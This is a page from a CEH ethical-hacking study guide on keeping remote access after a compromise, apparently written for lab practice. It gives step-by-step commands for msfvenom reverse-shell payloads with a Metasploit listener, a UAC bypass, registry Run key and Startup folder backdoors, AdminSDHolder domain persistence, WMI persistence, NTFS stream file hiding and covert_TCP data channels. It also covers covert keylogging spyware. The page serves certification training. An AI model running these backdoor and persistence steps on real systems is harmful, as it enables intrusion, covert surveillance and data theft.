CEH Practical Guide
  • Certified Ethical Hacker (CEH v12 and CEH V13) Practical Guide: Complete Study Resources & Tips
  • Module 2. Footprinting and Reconnaissance
    • 1. Footprinting through Search Engines
    • 2. Perform Footprinting Through Internet Research Services
    • 3. Footprinting through Social Networking sites
    • 4. Website Footprinting
    • 5. WHOIS Footprinting
    • 6. DNS Footprinting
    • 7. Network footprinting
    • 8. Email Footprinting
    • 9. Footprinting using footprinting tools
    • 10. Perform Footprinting using AI
  • Module 3. Scanning Networks
    • 1. Host Discovery
    • 2. Port and Service Discovery
    • 3. Perform OS Discovery
    • 4. Scan beyond Firewalls and IDS
    • 5. Network scanning using various tools
    • 6. Perform Network Scanning using AI
  • Module 4. Enumeration
    • 1. Netbios Enumeration (Port 137)
    • 2. SNMP Enumeration (Port 161,162)
    • 3. LDAP Enumeration (Port 389)
    • 4. NFS Enumeration
    • 5. DNS Enumeration
    • 6. SMTP Enumeration
    • 7. RPC, SMB and FTP Enumeration
    • 8. Enumeration using various tools
    • 9. Perform Enumeration using AI
  • Module 5. Vulnerability Assessment
    • 1. Perform Vulnerability Research with Vulnerability Scoring Systems and Databases
    • 2. Perform Vulnerability Assessment using Various Vulnerability Assessment Tools
    • 3. Perform Vulnerability Analysis using AI
  • Module 6. System Hacking
    • 1. Gain access to the system
    • 2. Privilege Escalation
    • 3. Maintain Remote Access and Hide Malicious Activities
    • 4. Clear Logs to hide the Evidence of Compromise
    • 5. Active Directory (AD) Attacks
  • Module 7. Malware Threats
    • 1. Gain access to systems with Trojans
    • 2. Infect the system using Virus
    • 3. Perform Static Malware Analysis
    • 4. Perform Dynamic Malware Analysis
  • Module 8. Sniffing
    • 1. Perform Active Sniffing
    • 2. Perform Network Sniffing using Various Sniffing Tools
    • 3. Detect Network Sniffing
  • Module 9. Social Engineering
    • 1. Perform Social Engineering using tools
    • 2. Detect a Phishing attack
    • 3. Audit Organization security for phishing attacks
    • 4. Social Engineering using AI
  • Module 10. Denial of Service
    • 1. Perform DOS and DDOS with various techniques
    • 2. Detect and Protect DOS and DDOS attacks
  • Module 11. Session Hijacking
    • 1. Perform Session Hijacking
    • 2. Detect Session Hijacking
  • Module 12. Evading IDS, antivirus and Honeypots
    • 1. Intrusion Detection using various tools
    • 2. Evade Firewall using Evasion Techniques
  • Module 13. Hacking Web Servers
    • 1. Footprint the Webserver
    • 2. Perform Webserver attacks
    • 3. Perform a Web Server Hacking using AI
  • Module 14. Hacking Web Applications
    • 1. Footprint the Web Infrastructure
    • 2. Perform Web applications Attacks
    • 3. Detect Web Vulnerabilities using using web application security tools
    • 4. Perform Web Application Hacking using AI
  • Module 15. SQL Injection
    • 1. Perform SQL Injection attacks
    • 2. Detect SQL Vulnerabilities using different tool
    • 3. Perform SQL Injection using AI
  • Module 16. Hacking Wireless Networks
    • 1. Footprint a wireless Network
    • 2. Perform Wireless Traffic Analysis
    • 3. Perform Wireless Attacks
  • Module 17. Hacking Mobile Platforms
    • 1. Hack Android Devices
    • 2. Secure Android Device
  • Module 18. IoT and OT Hacking
    • 1. Footprinting IoT and OT devices
    • 2. Capture and Analyze IoT traffic
    • 3. Perform IoT Attacks
  • Module 19. Cloud Computing
    • 1. Perform Reconnaissance on Azure
    • 2. S3 Bucket Enumeration
    • 3. Exploit S3 buckets
    • 4. Perform Privilege Escalation to Gain Higher Privileges
    • 5. Perform Vulnerability Assessment on Docker Images
  • Module 20. Cryptography
    • 1. Encrypt the Information using Various Cryptography Tools
    • 2. Create a self signed Certificate
    • 3. Perform Disk Encryption
    • 4. Cryptanalysis Using different tools
    • 5. Perform Cryptography using AI
  • Tips for exams
  • Additional Resources
Powered by GitBook
On this page
  • 1. User system Monitoring with PowerSpy
  • 2. System Monitoring with Spytech spyagent
  • 3. User System Monitoring and Surveillance using Spyrix
  • 4. Maintain Persistence by Modifying Registry Run Keys
  • 5. Hide files using NTFS ADS Streams
  • Appending Text File as ADS example
  • 6. Hide data using white space steganography
  • 7. Image Steganography using OpenStego and Stegonline
  • OpenStego
  • Stegonline
  • 8. Maintain persistence abusing boot or Logon autostart
  • 9. Maintain Domain Persistence exploiting Active Directory Objects
  • 10. Priv Esc with WMI and maintain persistance
  • 11. Covert channels using covert_TCP

Was this helpful?

  1. Module 6. System Hacking

3. Maintain Remote Access and Hide Malicious Activities

Remote code execution techniques are often performed after initially compromising a system and further expanding access to remote systems present on the target network.

Previous2. Privilege EscalationNext4. Clear Logs to hide the Evidence of Compromise

Last updated 2 months ago

Was this helpful?

1. User system Monitoring with PowerSpy

Keylogger software

2. System Monitoring with Spytech spyagent

3. User System Monitoring and Surveillance using Spyrix

Spyrix facilitates covert remote monitoring of user activities in real-time. It provides concealed surveillance via a secure web account, logging keystrokes with a keylogger, monitoring various platforms such as Facebook, WhatsApp, Skype, Email, etc. It also offers functionality of capturing screenshots, live viewing of screen and webcam feeds, continuous recording of screen and webcam activity.

4. Maintain Persistence by Modifying Registry Run Keys

Registry keys labeled as Run and RunOnce are crafted to automatically run programs upon each user login to the system. The command line specified as a key's data value is restricted to 260 characters or fewer. If attackers discover a service connected to a registry key with full permissions, they can execute persistence attacks or exploit privilege escalation.

We need two payloads. 1st we will use a payload to get access to the system and then we will use the 2nd payload to maintain persistence by adding it to the registry.

1st payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Test.exe

2nd Payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=4444 -f exe > /home/attacker/Desktop/registry.exe

Now, copy both payloads to the target system using any of the methods.

Now, on Kali linux, use the following commands to open a listener.

msfconsole
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 444 

Now, run the first payload on the target. You will get the shell.

Type getuid and press Enter to display current user ID. Now, we shall try to bypass the User Account Control setting that is blocking you from gaining unrestricted access to the machine.

Type background and press Enter, to background the current session.

we will bypass Windows UAC protection via SilentCleanup task present in Windows Task Scheduler. It is present in Metasploit as a bypassuac_silentcleanup exploit

n the terminal window, type use exploit/windows/local/bypassuac_silentcleanup and press Enter. Now, type set session 1 and press Enter.

To set the LHOST option, type set LHOST 10.10.1.13 and press Enter. To set the TARGET option, type set TARGET 0 and press Enter (here, 0 indicates nothing, but the Exploit Target ID).Type exploit and press Enter to begin the exploit on Windows 11 machine.

Type getsystem -t 1 and press Enter to elevate privileges. Now, type getuid and press Enter. The Meterpreter session is now running with system privileges. Type shell to start shell.

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"

Once the command is successfully executed, open another terminal window with root privileges and run msfconsole command. In Metasploit, type use exploit/multi/handler and press Enter. Now, type set payload windows/meterpreter/reverse_tcp and press Enter. Type set lhost 10.10.1.13 and press Enter to set lhost. Type set lport 4444 and press Enter to set lport. Now, type exploit to start the exploitation.

Once, the PC restarts, we will get the shell.

5. Hide files using NTFS ADS Streams

Copy calc from system32 folder to your test folder, Now create a text file

notepad readme.txt

You can type dir to check the size of file

Now lets append calc to readme.txt

type calc.exe >readme.txt:calc.exe

The size does not change. Now create a link to the hidden file

mklink backdoor.exe readme.txt:calc.exe

opening backdoor.exe will run the calculator hidden in txt file.

list hidden ADS streams

dir /r

Reference

Appending Text File as ADS example

6. Hide data using white space steganography

Conceal messages in ACII text by adding white spaces to the end of line.

Snow tool is used which can add upto 7 spaces interspersed with tabs.

Create a txt file and then use the following command to hide the message in the file.

SNOW.EXE -C -m "Hassan is my name" -p "magic" test.txt test2.txt

-m is the message you want to hide

-p is the password

test.txt is the original file

test2.txt is the target file

Opening test2.txt will not show us the hidden data. However, if we open the file in notepad and click edit>select all, we will see some hidden spaces.

To see the hidden message, use the following command.

SNOW.EXE -C -p "magic" test2.txt

7. Image Steganography using OpenStego and Stegonline

OpenStego

Select message file, cover file to hide data and click on hide

A new file will be created. It will open as an image but contains our message as well. Similarly extract data from the tool.

Stegonline

Upload file, and then set the settings, remember the settings.

similarly, the data can be extracted from the image.

8. Maintain persistence abusing boot or Logon autostart

After getting th admin meterpreter on remote machine, change to startup folder.

cd "C:\\ProgramData\Start Menu\Programs\\StartUp

check the working directory with pwd.

Now upload your, msfvenom payload here.

Other tools

9. Maintain Domain Persistence exploiting Active Directory Objects

AdminSDHolder is an Active Directory container with the default security permissions, it is used

as a template for AD accounts and groups, such as Domain Admins, Enterprise Admins etc. to

protect them from unintentional modification of permissions.

If a user account is added into the access control list of AdminSDHolder, the user will acquire

"GenericAll" permissions which is equivalent to domain administrators.

After gaining the meterpreter session, upload powertools master.

upload -r /home/attacker/Power-Tools-Master C:\\users\\Administrator\\Downloads

Now enter the shell and start powershell

shell
powershell

Now change directory to powertools folder and use the following commands to add Martin user to ACL.

import-Module ./powerview.psm1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=system' -principalSamAccountName Martin -Verbose -Rights all

To check the permissions, use the following commands

Get-ObjectAcl -SamAccountName "Martin" -ResolveGUIDs

Now to add the user to admin group use th following command

net group "Domain Admins" Martin /add /domain

From powershell, we can use the following command to check the persistence

dir \\192.168.10.18\C$

10. Priv Esc with WMI and maintain persistance

WMI (Windows Management Instrumentation) event subscription can be used to install event filters, providers, and bindings that execute code when a defined event occurs. It enables system administrators to perform tasks locally and remotely.

Get a meterpreter session and upload the script, have a second msfvenom payload ready as well.

Now within meterpreter load powershell

load powershell
powershell_shell

Now type the following commands to run the script

Import-Module ./WMI-Persistence.ps1
install-Persistence -Trigger Startup -Payload "C:\users\administrators\downloads\exploit.exe"

Now listen with multi handler on msf. In 5-10 minutes, you will get an admin shell.

11. Covert channels using covert_TCP

Networks use network access control permissions to permit or deny the traffic flowing through them. Tunneling is used to bypass the access control rules of firewalls, IDS, IPS, and web proxies to allow certain traffic. Covert channels can be created by inserting data into the unused fields of protocol headers. There are many unused or misused fields in TCP or IP over which data can be sent to bypass firewalls. The Covert_TCP program manipulates the TCP/IP header of the data packets to send a file one byte at a time from any host to a destination. It can act like a server as well as a client and can be used to hide the data transmitted inside an IP header. This is useful when bypassing firewalls and sending data with legitimate-looking packets that contain no data for sniffers to analyze. A professional ethical hacker or pen tester must understand how to carry covert traffic inside the unused fields of TCP and IP headers.

Sending Machine

Download the tool on your sending machine

wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c

Now compile it.

sudo apt install gcc
cc -o covert_tcp covert_tcp.c

2nd Machine

Compile the tool there as well. Now open the tcpdump listener.

sudo su
tcpdump -nvvX port 8888 -i lo  // do not need to, we dont get anything here

Start the listener

sudo ./covert_tcp -dest 192.168.18.144 -source 192.168.18.95 -source_port 8888 -dest_port 9999 -server -file /home/user/msg1.txt

Now , from the sending machine send the message.

sudo ./covert_tcp -dest 192.168.18.144 -source 192.168.18.95 -source_port 9999 -dest_port 8888 -file /home/kali/msg.txt

We, will get the text file as well in the same folder.

Power Spy LiteSoftonic
The SNOW Home Page
Basic Image Steganography for Beginners
Spytech SpyAgent Spy Software - Computer Monitoring Software - Internet Recording
Spyrix - Keylogger, Parental Control Software, Employee MonitoringSpyrix Security Monitoring
Windows Master file table, MFT forensics - CavemenTech - Demystifying TechnologyCavemenTech - Demystifying Technology
Free Steganography Software - QuickStego
Logo
Logo
Covert Communication
OpenStego
StegOnline
steghide | Kali Linux ToolsKali Linux
WMI-Persistence/WMI-Persistence.ps1 at master · n0pe-sled/WMI-PersistenceGitHub
Logo
Logo
Certified Ethical Hacker (CEHv12) Practical hands on LabsUdemy
CEH Practical Preparation Course
Logo
Logo
Logo
Logo
Logo